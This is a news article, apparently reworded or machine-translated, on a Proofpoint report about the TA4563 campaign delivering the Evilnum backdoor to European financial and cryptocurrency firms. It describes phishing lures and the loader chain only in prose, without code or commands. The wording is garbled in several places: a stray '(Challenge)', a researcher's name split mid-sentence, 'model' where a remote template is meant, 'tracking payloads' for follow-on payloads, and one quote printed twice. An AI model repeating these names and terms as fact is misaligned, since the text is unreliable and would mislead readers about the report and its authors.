Financial and investment entities are targeted in an ongoing campaign by attackers deploying the Evilnum malware, which is a known backdoor that can be used to steal data or load additional payloads.
The threat actor behind the activity, which Proofpoint researchers called TA4563, specifically targeted European companies with operations supporting foreign exchanges and cryptocurrency, and organizations in the decentralized finance industry. (Challenge). The campaign, which shares some overlap with the activity of the known Evilnum APT (also known as DeathStalker) reported by Zscaler in June, was first observed in late 2021 and is ongoing.
“Identified campaigns delivered an updated version of the Evilnum backdoor using a varied mix of ISO, Microsoft Word, and Shortcut (LNK) files in late 2021 and early 2022, likely as a method of testing the effectiveness of the methods of delivery,” Bryan said. Campbell, Pim Trouerbach and Selena Larson, researchers at Proofpoint in an analysis Thursday. “This malware can be used for reconnaissance, data theft and to deploy additional payloads.”
When the campaign was first observed in December, attackers sent targeted emails purporting to be signups for financial trading platforms. The messages used a remote document template, which then attempted to communicate with the domains that had installed the LNK loader components. These loader components started the Evilnum backdoor download process.
“Identified campaigns delivered an updated version of the Evilnum backdoor using a varied mix of ISO, Microsoft Word, and Shortcut (LNK) files in late 2021 and early 2022, likely as a method of testing the effectiveness of the methods of delivery.”
The campaign has evolved slightly over time: In early 2022, researchers observed the group sending emails that attempted to deploy OneDrive URLs containing ISO and .LNK attachments. These emails used decoys around financial documentation, including one that reminded victims to submit proof of identity and address. In a more recent campaign in mid-2022, attackers used decoys to ask victims to send ‘proof of ownership’ – but in reality the documents attached to the emails led them to what researchers believe to be a domain controlled by the actors.
“As the threat actor maintained consistent targeting and victimology, the methodology changed again,” the researchers said. “During mid-2022 campaigns, TA4563 delivered Microsoft Word documents in an attempt to upload a model remotely.”
From there, the loader ran PowerShell (via cmd.exe) to download two different payloads. The first was responsible for running two PowerShell scripts, including one used to decrypt a PNG that follows logic to restart the infection chain, and one that sends screenshots to a command and control (C2) server. . The second contained two encrypted blocks that both worked for an executable to decrypt a TMP file to load a shellcode file, which ultimately resulted in a decrypted PE file.
“Several applications are executed depending on the antivirus software – Avast, AVG or Windows Defender – found on the host,” the researchers said. “The malware will try to call multiple executables likely already on the host machine (e.g. TechToolkit.exe and nvapiu.exe). The malware execution chain will change to better evade detection from the identified antivirus engine.
Evilnum can be used for reconnaissance, data theft, and loading tracking payloads. Although researchers have not observed any tracking payloads deployed in campaigns, they have reported third-party reports that show Evilnum malware being used to distribute tools available through Golden Chickens malware as a service .
“TA4563 has adjusted its attempts to compromise victims using various delivery methods, while Proofpoint has observed this activity and provided detection updates to thwart this activity, it should be noted that a persistent adversary will continue to adjust his posture in his attempts to compromise,” the researchers said.